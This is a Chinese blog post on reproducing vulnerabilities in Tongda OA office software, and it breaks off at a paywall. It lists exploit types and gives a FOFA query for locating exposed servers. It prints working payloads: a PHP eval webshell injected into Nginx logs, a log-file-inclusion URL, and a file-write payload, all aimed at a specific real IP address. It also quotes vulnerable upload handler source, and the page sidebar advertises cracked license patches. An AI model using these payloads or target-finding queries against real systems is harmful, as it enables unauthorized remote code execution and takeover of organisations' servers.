漏洞复现-通达TongdaOA系列

VIP文章 已于 2024-03-15 10:24:09 修改
阅读量4.1k 收藏
点赞数
文章标签: 安全 web安全
于 2022-10-03 22:21:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33608000/article/details/127157183
版权

在这里插入图片描述

通达OA

(16).通达OA--------------------------------------------fofa:app=“TDXK-通达OA”

tongdaoa_getdata-RCE (直接执行系统命令)
tongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)

TongdaOA_Attachment_remark_FileInclude漏洞
TongdaOA_Management_Upload_Getshell漏洞
TongdaOA_Delete_Authincphp_Getshell漏洞
TongdaOA_Ispirit_Upload_Getshell漏洞
TongdaOA_Api_Ali_Upload_Getshell漏洞
TongdaOA_Report_Bi_Sqlnjection漏洞
TongdaOA_Swfupload_Sqlnjection漏洞
TongdaOA_File_Include_Getshell漏洞
TongdaOA_Get_Contactlist漏洞
TongdaOA_AnyUser_Login漏洞

通达OA 网络智能办公系统 是由北京通达信科科技有限公司开发的一款办公系统
采用基于WEB的企业计算,
主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。
数据存取集中控制,避免了数据泄漏的可能。
提供数据备份工具,保护系统数据安全。
多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。

自主研发的协同办公自动化软件,
是与中国企业管理实践相结合形成的综合管理办公平台
2015年,通达云OA入驻阿里云企业应用专区,为众多中小企业提供稳定、可靠的云计算支撑

通达OA可供用户免费下载使用,安装简单,默认安装了Nginx、mysql等服务,
系统默认由System权限启动

360安全大脑-Quake网络空间测绘系统通过对全网资产测绘

在这里插入图片描述

1:未授权文件上传 + 文件包含姿势

2:Nginx日志 + 文件包含

http://www.360doc.com/content/20/0405/19/64353657_904057447.shtml
58.56.254.122:8081/<?php@eval($_POST['aming']);?>

http://58.56.254.122:8081/ispirit/interface/gateway.php?json={}&url=…/…/ispirit/…/…/nginx/logs/oa.access.log

http://cn-sec.com/archives/498043.html
http://58.56.254.122:8081/ispirit/interface/gateway.php?json={}&aa=<?php file_put_contents('1.php','hello world');?>

通达OA2017,V11.X<V11.5
通达oa远程命令执行:影响的版本有:V11版,2017版,2016版,2015版,2013增强版,2013版。

app=“通达OA” body=" static/images/tongda.ico"

在这里插入图片描述
在这里插入图片描述

http://www.dennis.org.cn/

https://blog.csdn.net/szgyunyun/article/details/107104288

https://blog.csdn.net/blue_fantasy/article/details/122403451

https://blog.csdn.net/weixin_44831109/article/details/123841373

https://blog.csdn.net/qq_29443517/article/details/106275093

CNVD:CNVD-2020-26562

未授权的情况下可上传图片木马文件
精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击

影响范围
通达OA V11版 <= 11.3 20200103
通达OA 2017版 <= 10.19 20190522
通达OA 2016版 <= 9.13 20170710
通达OA 2015版 <= 8.15 20160722
通达OA 2013增强版 <= 7.25 20141211
通达OA 2013版 <= 6.20 20141017

V11版 2017版 2016版 2015版 2013增强版2013版
未授权上传文件
\ispirit\im\upload.php

<?php

set_time_limit(0);
$P = $_POST['P'];
if (isset($P) || $P != '') {
   
 ob_start();
 include_once 'inc/session.php';
 session_id($P);
 session_start();
 session_write_close();
} else {
   
 include_once './auth.php';
}
include_once 'inc/utility_file.php';
include_once 'inc/utility_msg.php';
include_once 'mobile/inc/funcs.php';
ob_end_clean();
$TYPE = $_POST['TYPE'];
$DEST_UID = $_POST['DEST_UID'];
$dataBack = array();
if ($DEST_UID != '' && !td_verify_ids($ids)) {
   
 $dataBack = array('status' => 0, 'content' => '-ERR ' . 
 _('接收
 方ID无效'));
 echo json_encode(data2utf8($dataBack));
 exit;
}
if (strpos($DEST_UID, ',') !== false) {
   
} else {
   
 $DEST_UID = intval($DEST_UID);
}
if ($DEST_UID == 0) {
   
 if ($UPLOAD_MODE != 2) {
   
 $dataBack = array('status' => 0, 'content' => '-ERR ' . 
 _('接收方ID无效'));
 echo json_encode(data2utf8($dataBack));
 exit;
 }
}
$MODULE = 'im';
if (1 <= count($_FILES)) {
   
 if ($UPLOAD_MODE == '1') {
   
 if (strlen(urldecode($_FILES['ATTACHMENT']['name'])) != 
 strlen($_FILES['ATTACHMENT']['name'])) {
   
 $_FILES['ATTACHMENT']['name'] = 
 urldecode($_FILES['ATTACHMENT'][
最低0.47元/天 解锁文章
amingMM
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
漏洞复现-通达OA】通达OA WHERE_STR 存在前台SQL注入漏洞
xiaokp7的博客
02-18 233
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA WHERE_STR存在前台SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
漏洞复现-通达OA】通达OA前台任意用户登录漏洞
xiaokp7的博客
06-18 1699
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA < 11.5.200417存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
通达OA v2017 video_file.php 任意文件下载漏洞.md
09-07
通达OA漏洞合集
漏洞复现通达OA share/handle.php身份认证绕过漏洞
晚风不及你
12-08 579
通达OA(Office Anywhere网络智能办公系统)是由通达信科科技自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。
通达OA 身份认证绕过漏洞复现
12-12 660
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
通达OA_文件包含漏洞
黑剑
09-08 740
复现靶场:通达2017版漏洞文件:td\webroot\ispirit\interface\gateway.php漏洞地址: /mac/gateway.php漏洞POC:json={“url”:“/general/…/…/mysql5/my.ini”}
【新】通达OA前台反序列化漏洞分析
C20220511的博客
08-07 1639
通达OA作为历史上出现漏洞较多的OA,在经过多轮的迭代之后已经很少前台的RCE漏洞了。对应12系列未做过多测试,本文提到的所有漏洞在最新版的通达12.4中已修复,使用此漏洞造成的任何攻击影响均与本文作者无关。在上面的方法中会对传入的Cookie值进行签名校验,校验的方法是validateData,其中$this->cookieValidationKey是签名的key。继续跟踪loadCookies方法,在这个方法中会调用unserialize方法对传入的Cookie的值进行反序列化。
通达OA系统11.2漏洞
qq_50854662的博客
12-02 4386
通达OA系统11.2版本为案例的Web渗透
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
bluemoon_0的博客
02-15 673
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
通达OA前台任意用户登录漏洞+RCE漏洞复现
热门推荐
szgyunyun的博客
07-03 1万+
用老弟的服务器搭了个靶机就不打码了用完就关了 任意用户登录:影响版本:通达OA2017,V11.X<V11.5 通达oa远程命令执行:影响的版本有:V11版,2017版,2016版,2015版,2013增强版,2013版。 1、任意用户登录 1)登录处抓包 2)修改再发包 需修改以下三个地方: /logincheck.php /logincheck_code.php 删除cookie在post包中添加UID=1 3)用获取的SESSID访问/general/ 未授权文件上传 任意文
TongDaOA-Fake-User:通达OA任意用户登录突破
03-19
TongDaOA-虚假用户 通达OA前台任意用户登录拆分 违反安全研究,禁止非法利用! 使用方法 python3 poc.py -v版本-url url 运行并获取到可用的SESSIONID 替换浏览器Cookie中的SESSIONID立即实现登录为admin 影响范围 ...
通达OA2016破解补丁
05-03
1、安装通达OA2016试用版 2、停止所有OA服务,完整备份所有文件及数据库。 3、解压覆盖源文件,启动服务 通达OA二次开发及技术支持 QQ 1610572998 完整版下载地址 http://tongdaoa.blog.163.com/ ...
tongdaOA2011-OfficeIm.rar
01-11
oa2011无限制im组件好用,破解了,无限制的
通达oa2015破解补丁
05-21
通达oa2015破解补丁
tongdaoa2009.rar
04-27
网上有人在买,看不下去了,把源码放上来供大家参考。
数字时代安全风险防范与保密科技创新
最新发布
qq_41432686的博客
04-18 948
当前,随着科技的迅猛发展和经济社会数字化转型的加速演进,以人工智能、大数据、云计算、区块链、量子计算等为代表的新技术不断应用于社会生活各领域,给保密工作带来了新的发展机遇,也带来了较大挑战。一些国家加强新技术在保密领域的应用,不断提升保密水平和维护国家安全能力,同时加快出台监管政策,规范新技术领域发展,并积极探索安全保密与技术发展的平衡,确保信息安全。用好新技术这把“双刃剑”,既便利信息资源的传播利用,又能有效防范潜在的安全风险,是新时代保密工作亟待解决的新课题。
如何保护IP地址?安全匿名上网的方法
EVA_Proxy的博客
04-11 1323
IP地址是互联网协议地址的简称,它是一个独特的数字组合,专门用来识别和定位路由器、计算机或其他设备,确保它们能够顺畅地通过互联网进行通信。正如电子邮件地址能让别人给您发送邮件一样,远程计算机也需要您的IP地址来与您的计算机建立联系并进行交流。通常,IP地址的格式是由四个数字块组成的一个序列。每个数字块的取值范围都在0到255之间,这意味着每个数字块有256种可能的组合。这样的数字IP系统可以生成大约40亿个不同的IP地址。实际上,要追踪到某个人的IP地址并不是特别困难。
如何搭建高效安全的eBay测评环境:步骤与要点解析
weixin_61644212的博客
04-18 361
同时,要确保在整个过程中遵守相关法律法规和平台规定,确保测评的安全性和可持续性。使用防关联的浏览器,确保每个账号在浏览器层面上独立运行,防止关联。:确保每个账号都有独立的IP地址和支付工具,避免使用重复资源。:在处理个人信息和交易数据时,确保数据的安全性和隐私保护。:准备足够数量的纯净国外家庭住宅IP,确保每个账号都有独立的IP地址,避免IP重复率过高。:使用国外的服务器和纯净的国外家庭住宅IP,通过远程安全终端进行搭建,阻断硬件参数的关联。:信用卡或礼品卡等支付工具,确保支付流程的顺畅和安全
什么是WAAP,对网络安全可以起到哪些帮助
dexunyun的博客
04-15 609
随着网络威胁的不断演变和复杂化,德迅云安全全站防护基于风险管理和WAAP理念打造的安全方案,可以应对各种新的挑战和攻击手段,为各类Web、API业务等防御来自网络层和应用层的攻击,帮助企业全面提升Web安全水位和安全运营效率。传统的安全解决方案通常不能很好的区分来自L3-L7层的恶意流量,但是WAAP全站防护解决方案具备这个能力,聚合DDoS云清洗、Web攻击防护、业务安全、API安全、全站隔离5大模块,实现覆盖L3-L7层的全站防护。这些组件协同工作,以提供多层防护,确保Web应用程序和API的安全
如何用FOFA搜索通达oa相关信息
06-11
您可以使用以下语句在FOFA上搜索通达OA相关信息: ``` title="通达OA" || body="Powered by TongdaOA" ``` 这个语句将匹配所有包含标题为“通达OA”或包含“Powered by TongdaOA”文本的网站。这些网站可能包含通达OA的相关信息。请注意,FOFA搜索需要付费使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

amingMM

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值